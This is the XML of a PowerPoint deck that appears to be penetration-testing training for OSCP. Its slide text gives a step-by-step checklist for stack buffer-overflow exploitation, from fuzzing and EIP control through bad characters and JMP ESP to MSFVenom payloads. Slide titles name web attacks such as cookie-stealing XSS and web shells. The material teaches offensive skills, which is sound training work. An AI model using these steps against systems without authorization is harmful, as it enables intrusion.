                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="32" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="33" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 2.91667E-6 0.33681 L 2.91667E-6 -0.07175 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-20440"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="1" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="39" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="40" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 2.91667E-6 -2.96296E-6 L 2.91667E-6 -0.38564 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-19282"/>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4.16667E-7 7.40741E-7 L -4.16667E-7 0.51481 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="2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p:bldP spid="39" grpId="0"/>
      <p:bldP spid="40" grpId="0" animBg="1"/>
      <p:bldP spid="41" grpId="0" animBg="1"/>
      <p:bldP spid="42" grpId="0"/>
      <p:bldP spid="42" grpId="1"/>
      <p:bldP spid="43" grpId="0"/>
      <p:bldP spid="43" grpId="1"/>
      <p:bldP spid="53" grpId="0" animBg="1"/>
      <p:bldP spid="60" grpId="0" animBg="1"/>
      <p:bldP spid="61" grpId="0"/>
      <p:bldP spid="62" grpId="0" animBg="1"/>
      <p:bldP spid="62"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0ACE5-B3E9-4922-9259-6A009AE733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A108BD0-5376-4697-8AB7-2090EC8EB3FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Checklist 1/2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1915E9A3-9F8F-4A6F-B7AC-63455839FD62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 1: Fuzz – Find how many characters it takes to crash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 2: Find the Offset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf-pattern_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf-pattern_offset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to find exactly how many bytes you need</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 3: Control the EIP and find payload space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using the offset above, put 4 “B” characters to ensure when the program crashes, you know where to put the next instruction, and fill up as much space AFTER the EIP with “C”s to determine your payload limit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 4: Find Bad Characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The program (or delivery protocol) may have unique meanings for certain characters which will cause your payload to fail. You need to find these by trying every possible byte and examining the memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3083242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D00DD-7FB5-44C0-AA7F-65C0EC8889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921AD94-A2F7-4703-B26D-7C0CC2F20A58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Checklist 2/2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26D3D059-E118-452F-841E-E0A41DB518D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 5: Find a way to your payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For OSCP, this will often be a JMP ESP command, but you may need to get creative to find a way to load your desired memory address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Put this into your exploit IN REVERSE ORDER since we’re most likely working with little endian</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 6: Generate a payload with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MSFVenom</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure you double check your bad characters, the payload type (e.g. 32 vs 64 bit), local host and port, and use EXITFUNC=thread to avoid the program crashing after the exploit runs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1707395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DFFB4-A77E-4844-9107-190AF37ACF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4CD06853-6E46-452B-A03E-51C1DBC2BDB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Immunity Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4589D6E3-76FF-4474-A835-D5B6BF4FC75F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="947428" y="1066800"/>
            <a:ext cx="10297144" cy="4933376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32592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9F809-79E3-4A3F-BA77-EFC20A41B7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DC1737B-2160-455C-9F84-C9C302E01E23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Immunity Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D95AA44F-5699-4284-8539-0A6223CA9DEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="749871" y="1094068"/>
            <a:ext cx="10297144" cy="4933376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E814E82A-9038-4BF1-9F49-642C1B9B631C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713867" y="1079798"/>
            <a:ext cx="10333148" cy="5001490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:alpha val="90000"/>
            </a:scheme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21" name="Isosceles Triangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC50FD83-347C-4ABB-8CAF-07CA464109E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="1242227" y="2355820"/>
            <a:ext cx="4785066" cy="1935078"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 67183"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha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pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6103007-DC11-4999-BA22-19AF6C701087}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="6569" r="59440" b="37406"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4527417" y="925684"/>
            <a:ext cx="7238426" cy="4790208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0375EC62-0909-485A-9387-9097A79B55C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785875" y="2858264"/>
            <a:ext cx="254196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nsolas"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Assembly Instructions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3843321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9F809-79E3-4A3F-BA77-EFC20A41B7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800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="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DC1737B-2160-455C-9F84-C9C302E01E23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Immunity Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E3D5B96-1B56-4C73-9057-0BB190003961}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="983432" y="1081070"/>
            <a:ext cx="10297144" cy="4933376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F83F5EC-9A48-4262-8B57-AEA58BF88BD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947428" y="1066800"/>
            <a:ext cx="10333148" cy="5001490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:alpha val="90000"/>
            </a:scheme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3" name="Isosceles Triangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A38C5851-1FCA-4A8F-AA8B-4AF418E5C822}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4590743" y="1579404"/>
            <a:ext cx="4477808" cy="3645278"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 67183"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha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a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C647829-DE5E-4ECC-A5ED-02757661F178}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8544272" y="2620531"/>
            <a:ext cx="221887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nsolas"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Registers</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{067DC419-AF36-40A1-8EFA-E3E6D9CB8D91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="54196" t="7062" r="23077" b="46960"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="631064" y="1156263"/>
            <a:ext cx="4695530" cy="4551053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="467684595"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="blue_4">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TRE-PPT-template-16x9-blue-2022-v1.potx" id="{91E2C48E-5DD4-4738-9B18-468F2535F963}" vid="{4FE3D8CF-2821-40C7-A68D-22E8669502CE}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="blue_3">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raverxec.potx" id="{5FF51D89-2B08-48DC-81CF-9C423ED26043}" vid="{9C0C8BF0-2F25-4765-9E38-F7E46B372295}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="blue_2">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4" id="{EDA5D221-2F87-7B45-AC35-4B8A769F4A4B}" vid="{22F4453F-DDAF-9E40-AF87-36293F108468}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme4.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="blue_1">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4" id="{EDA5D221-2F87-7B45-AC35-4B8A769F4A4B}" vid="{22F4453F-DDAF-9E40-AF87-36293F108468}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme5.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="blue">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tre-blue" id="{B9A3AE27-08F6-4F79-B664-1FBC731CF9B5}" vid="{559FB65F-2266-455F-AAAF-3B9612513A4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12375</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>2297</Paragraphs>
  <Slides>311</Slides>
  <Notes>5</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311</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="325" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Regular</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Candara</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Impact</vt:lpstr>
      <vt:lpstr>Slack-Lato</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>blue_4</vt:lpstr>
      <vt:lpstr>blue_3</vt:lpstr>
      <vt:lpstr>blue_2</vt:lpstr>
      <vt:lpstr>blue_1</vt:lpstr>
      <vt:lpstr>blue</vt:lpstr>
      <vt:lpstr>Notes on the Material</vt:lpstr>
      <vt:lpstr>Chapter 1: Reconnaissance </vt:lpstr>
      <vt:lpstr>Agenda/Disclaimer</vt:lpstr>
      <vt:lpstr>Passive Recon / Research</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Modern Encyclopedia: The Internet</vt:lpstr>
      <vt:lpstr>Things to Look For</vt:lpstr>
      <vt:lpstr>Importance of Research: Case Study</vt:lpstr>
      <vt:lpstr>Active Recon</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>AutoRecon (LINK) </vt:lpstr>
      <vt:lpstr>Port Scanning</vt:lpstr>
      <vt:lpstr>Port Scanning - Nmap (1/6)</vt:lpstr>
      <vt:lpstr>Port Scanning - Nmap (2/6)</vt:lpstr>
      <vt:lpstr>Port Scanning - Nmap (3/6)</vt:lpstr>
      <vt:lpstr>Port Scanning - Nmap (4/6)</vt:lpstr>
      <vt:lpstr>Port Scanning - Nmap (5/6)</vt:lpstr>
      <vt:lpstr>Port Scanning - Nmap (6/6)</vt:lpstr>
      <vt:lpstr>Bonus: nc and telnet</vt:lpstr>
      <vt:lpstr>Web Servers</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Browser Enumeration</vt:lpstr>
      <vt:lpstr>Browser Enumeration</vt:lpstr>
      <vt:lpstr>Banner Grabbing</vt:lpstr>
      <vt:lpstr>Nikto</vt:lpstr>
      <vt:lpstr>Directory Busting</vt:lpstr>
      <vt:lpstr>Gobuster</vt:lpstr>
      <vt:lpstr>Dirb</vt:lpstr>
      <vt:lpstr>Dirbuster</vt:lpstr>
      <vt:lpstr>Server Message Block (SMB)</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>enum4linux</vt:lpstr>
      <vt:lpstr>smbmap</vt:lpstr>
      <vt:lpstr>smbclient</vt:lpstr>
      <vt:lpstr>DNS</vt:lpstr>
      <vt:lpstr>Quick Overview</vt:lpstr>
      <vt:lpstr>/etc/hosts</vt:lpstr>
      <vt:lpstr>host and nslookup</vt:lpstr>
      <vt:lpstr>dig</vt:lpstr>
      <vt:lpstr>Zone Transfers</vt:lpstr>
      <vt:lpstr>Closing Thoughts</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Chapter 2: Web Application Attacks </vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Recon Recap</vt:lpstr>
      <vt:lpstr>Recap</vt:lpstr>
      <vt:lpstr>Burp Suite</vt:lpstr>
      <vt:lpstr>Burp Suite</vt:lpstr>
      <vt:lpstr>Proxy and Scope</vt:lpstr>
      <vt:lpstr>Example Request Pane</vt:lpstr>
      <vt:lpstr>Intruder (1/2)</vt:lpstr>
      <vt:lpstr>Intruder (2/2)</vt:lpstr>
      <vt:lpstr>Repeater</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>A little theory</vt:lpstr>
      <vt:lpstr>Uses and Limitations</vt:lpstr>
      <vt:lpstr>Stored Example – Simple Alert</vt:lpstr>
      <vt:lpstr>Stored Example – Stealing a Cookie</vt:lpstr>
      <vt:lpstr>Reflected Example</vt:lpstr>
      <vt:lpstr>Real World Case Study</vt:lpstr>
      <vt:lpstr>Real World Case Study – Protections</vt:lpstr>
      <vt:lpstr>Real World Case Study – Getting Malicious</vt:lpstr>
      <vt:lpstr>Recent XSS</vt:lpstr>
      <vt:lpstr>File Inclusion</vt:lpstr>
      <vt:lpstr>A little theory</vt:lpstr>
      <vt:lpstr>Directory Traversal</vt:lpstr>
      <vt:lpstr>Local File Inclusion Example</vt:lpstr>
      <vt:lpstr>Remote File Inclusion Example – Web Shell</vt:lpstr>
      <vt:lpstr>Remote File Inclusion Example – Code Execution</vt:lpstr>
      <vt:lpstr>Uploads and Filters</vt:lpstr>
      <vt:lpstr>File Uploads</vt:lpstr>
      <vt:lpstr>Filters</vt:lpstr>
      <vt:lpstr>Basic Webshell Example</vt:lpstr>
      <vt:lpstr>Basic Filter Example</vt:lpstr>
      <vt:lpstr>Injection</vt:lpstr>
      <vt:lpstr>The Problem</vt:lpstr>
      <vt:lpstr>Tips for Exploitation</vt:lpstr>
      <vt:lpstr>Basic Command Injection Example</vt:lpstr>
      <vt:lpstr>SQL Injection Part 1</vt:lpstr>
